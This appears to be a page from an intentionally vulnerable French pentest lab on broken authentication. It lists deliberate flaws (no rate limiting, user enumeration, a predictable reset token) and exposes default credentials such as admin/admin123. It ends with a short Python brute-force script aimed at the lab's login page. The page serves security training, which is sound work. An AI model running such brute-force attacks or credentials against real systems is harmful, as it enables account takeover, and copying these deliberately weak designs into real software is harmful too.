Pentest Lab - Failles de Securite

ATTENTION: Ces pages contiennent des vulnerabilites volontaires pour tests uniquement!

Broken Authentication

Cette page contient des vulnerabilites d'authentification: credentials faibles, enumeration d'utilisateurs, tokens previsibles.

Indices d'exploitation

  • Bruteforce: Pas de rate limiting, essayez des mots de passe communs
  • Enumeration: Les messages d'erreur revelent si l'utilisateur existe
  • Token previsible: Le token de reset est base sur l'email + date
  • Credentials: admin/admin123, user/password, test/test

Connexion

Reset mot de passe

Utilisateurs valides

Cette information ne devrait pas etre visible, mais elle est exposee pour le test:

Username Password Force
admin admin123 TRES FAIBLE
user password TRES FAIBLE
test test TRES FAIBLE

Vulnerabilites presentes

Script de bruteforce exemple

# Python bruteforce script import requests url = "https://cote-dev.fr/vulnerable/broken-auth/login" passwords = ["admin", "password", "123456", "admin123", "test"] for pwd in passwords: r = requests.post(url, json={"username": "admin", "password": pwd}) if "success" in r.json(): print(f"Found: admin/{pwd}") break